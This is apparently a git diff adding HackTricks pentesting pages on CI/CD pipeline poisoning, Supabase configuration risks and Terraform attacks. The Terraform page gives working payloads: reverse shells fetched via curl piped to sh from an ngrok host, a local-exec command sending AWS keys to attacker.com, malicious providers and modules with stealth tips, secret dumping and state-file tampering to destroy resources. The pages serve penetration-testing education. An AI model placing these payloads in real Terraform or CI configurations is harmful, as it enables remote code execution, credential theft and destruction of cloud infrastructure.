+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/pentesting-ci-cd/pentesting-ci-cd-methodology.md
new file mode 100644
index 0000000000..58cde5a815
--- /dev/null
+++ b/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -0,0 +1,131 @@
+# Pentesting CI/CD Methodology
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+<figure><img src="../.gitbook/assets/CLOUD-logo-letters.svg" alt=""><figcaption></figcaption></figure>
+
+## VCS
+
+VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
+
+* Github
+* Gitlab
+* Bitbucket
+* Gitea
+* Cloud providers (they offer their own VCS platforms)
+
+## CI/CD Pipelines
+
+CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
+
+However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
+
+## VCS Pentesting Methodology
+
+{% hint style="info" %}
+Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
+{% endhint %}
+
+Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
+
+* **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
+* **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
+  * **Register**: Some platforms will just allow external users to create an account.
+  * **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
+  * **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
+* **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
+  * If no secret is in place, the attacker could abuse the webhook of the third party platform
+  * If the secret is in the URL, the same happens and the attacker also have the secret
+* **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
+  * Compromise the main branch to **compromise production**.
+  * Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
+  * **Compromise the pipeline** (check next section)
+
+## Pipelines Pentesting Methodology
+
+The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
+These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
+
+Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
+
+### PPE - Poisoned Pipeline Execution
+
+The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
+
+For a malicious actor to be successful performing a PPE attack he needs to be able to:
+
+* Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
+  * Note that sometimes an **external PR count as "write access"**.
+* Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
+  * For this, he might need to be able to **bypass branch protections**.
+
+There are 3 PPE flavours:
+
+* **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
+* **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
+* **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
+  * **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+
+### Exploitation Benefits
+
+Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
+
+* **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
+  * Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
+* **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
+  * **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
+  * **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
+  * **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
+  * **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
+* **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+
+## More relevant info
+
+### Tools & CIS Benchmark
+
+* [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+
+### Top 10 CI/CD Security Risk
+
+Check this interesting article about the top 10 CI/CD risks according to Cider: [**https://www.cidersecurity.io/top-10-cicd-security-risks/**](https://www.cidersecurity.io/top-10-cicd-security-risks/)
+
+### Labs
+
+* On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
+* Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
+
+### Automatic Tools
+
+* [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+
+## References
+
+* [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm\_source=github\&utm\_medium=github\_page\&utm\_campaign=ci%2fcd%20goat\_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/supabase-security.md b/pentesting-ci-cd/supabase-security.md
new file mode 100644
index 0000000000..3dda145114
--- /dev/null
+++ b/pentesting-ci-cd/supabase-security.md
@@ -0,0 +1,193 @@
+# Supabase Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
+
+### Subdomain
+
+Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
+
+## **Database configuration**
+
+{% hint style="success" %}
+**This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/database`**
+{% endhint %}
+
+This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
+The password is a **password the user put** previously.
+
+Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
+
+This section also contains options to:
+
+* Reset the database password
+* Configure connection pooling
+* Configure SSL: Reject plan-text connections (by default they are enabled)
+* Configure Disk size
+* Apply network restrictions and bans
+
+## API Configuration
+
+{% hint style="success" %}
+**This data can be accessed from a link like `https://supabase.com/dashboard/project/<project-id>/settings/api`**
+{% endhint %}
+
+The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
+
+### anon api keys
+
+It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
+
+It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
+
+<details>
+
+<summary>Signup (/auth/v1/signup)</summary>
+
+```
+POST /auth/v1/signup HTTP/2
+Host: id.io.net
+Content-Length: 90
+X-Client-Info: supabase-js-web/2.39.2
+Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
+Sec-Ch-Ua-Mobile: ?0
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
+Sec-Ch-Ua-Platform: "macOS"
+Accept: */*
+Origin: https://cloud.io.net
+Sec-Fetch-Site: same-site
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://cloud.io.net/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Priority: u=1, i
+
+{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
+```
+
+</details>
+
+<details>
+
+<summary>Login (/auth/v1/token?grant_type=password)</summary>
+
+```
+POST /auth/v1/token?grant_type=password HTTP/2
+Host: hypzbtgspjkludjcnjxl.supabase.co
+Content-Length: 80
+X-Client-Info: supabase-js-web/2.39.2
+Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
+Sec-Ch-Ua-Mobile: ?0
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
+Sec-Ch-Ua-Platform: "macOS"
+Accept: */*
+Origin: https://cloud.io.net
+Sec-Fetch-Site: same-site
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://cloud.io.net/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Priority: u=1, i
+
+{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
+```
+
+</details>
+
+So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
+
+### secret / service\_role api keys
+
+A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
+
+The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+
+### JWT Secret
+
+A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
+
+## Authentication
+
+### Signups
+
+{% hint style="success" %}
+By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
+{% endhint %}
+
+However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
+This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
+
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+
+### Passwords & sessions
+
+It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
+It's recommended to **improve the requirements as the default ones are weak**.
+
+* User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
+* Bot and Abuse Protection: It's possible to enable Captcha.
+
+### SMTP Settings
+
+It's possible to set an SMTP to send emails.
+
+### Advanced Settings
+
+* Set expire time to access tokens (3600 by default)
+* Set to detect and revoke potentially compromised refresh tokens and timeout
+* MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
+* Max Direct Database Connections: Max number of connections used to auth (10 by default)
+* Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
+
+## Storage
+
+{% hint style="success" %}
+Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
+{% endhint %}
+
+* Set the upload file size limit (default is 50MB)
+* The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
+* It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
+
+## Edge Functions
+
+It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/terraform-security.md b/pentesting-ci-cd/terraform-security.md
new file mode 100644
index 0000000000..d294608f63
--- /dev/null
+++ b/pentesting-ci-cd/terraform-security.md
@@ -0,0 +1,245 @@
+# Terraform Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Basic Information
+
+[From the docs:](https://developer.hashicorp.com/terraform/intro)
+
+HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
+
+#### How does Terraform work?
+
+Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
+
+![](<../.gitbook/assets/image (177).png>)
+
+HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
+
+The core Terraform workflow consists of three stages:
+
+* **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
+* **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
+* **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
+
+![](<../.gitbook/assets/image (215).png>)
+
+### Terraform Lab
+
+Just install terraform in your computer.
+
+Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
+
+### RCE in Terraform
+
+Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
+
+However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
+
+The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
+
+Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
+
+{% content-ref url="atlantis-security.md" %}
+[atlantis-security.md](atlantis-security.md)
+{% endcontent-ref %}
+
+If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
+
+#### Terraform plan
+
+Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
+
+**Using an external provider**
+
+Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
+
+Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
+
+```javascript
+data "external" "example" {
+  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+}
+```
+
+**Using a custom provider**
+
+An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
+
+```javascript
+ terraform {
+        required_providers {
+            evil = {
+                source  = "evil/evil"
+                    version = "1.0"
+            }
+        }
+    }
+
+provider "evil" {}
+```
+
+The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
+
+You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
+
+**Using an external reference**
+
+Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
+
+* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+
+```javascript
+module "not_rev_shell" {
+  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+}
+```
+
+You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
+
+* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+
+#### Terraform Apply
+
+Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+You just need to make sure some payload like the following ones ends in the `main.tf` file:
+
+```json
+// Payload 1 to just steal a secret
+resource "null_resource" "secret_stealer" {
+  provisioner "local-exec" {
+    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+  }
+}
+
+// Payload 2 to get a rev shell
+resource "null_resource" "rev_shell" {
+  provisioner "local-exec" {
+    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+  }
+}
+```
+
+Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
+
+### Secrets Dumps
+
+You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
+
+```json
+output "dotoken" {
+  value = nonsensitive(var.do_token)
+}
+```
+
+### Abusing Terraform State Files
+
+In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+
+#### Deleting resources <a href="#deleting-resources" id="deleting-resources"></a>
+
+There are 2 ways to destroy resources:
+
+1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
+
+Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+
+```json
+{
+  "mode": "managed",
+  "type": "aws_instance",
+  "name": "example",
+  "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+  "instances": [
+    {
+      "attributes": {
+        "id": "i-1234567890abcdefg"
+      }
+    }
+  ]
+},
+```
+
+2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
+
+For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+
+#### RCE
+
+It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
+
+```json
+"resources": [
+{
+  "mode": "managed",
+  "type": "scaffolding_example",
+  "name": "example",
+  "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+  "instances": [
+
+  ]
+},
+```
+
+### Replace blacklisted provider
+
+In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
+
+```terraform
+terraform {
+  required_providers {
+    external = {
+      source  = "nazarewk/external"
+      version = "3.0.0"
+    }
+  }
+}
+```
+
+Then you can use `external` as per normal.
+
+```terraform
+data "external" "example" {
+  program = ["sh", "-c", "whoami"]
+}
+```
+
+### Audit Tools
+
+* [**tfsec**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
+* [**terascan**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code.
+
+### References
+
+* [Atlantis Security](atlantis-security.md)
+* [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
+* [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro)
+* [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
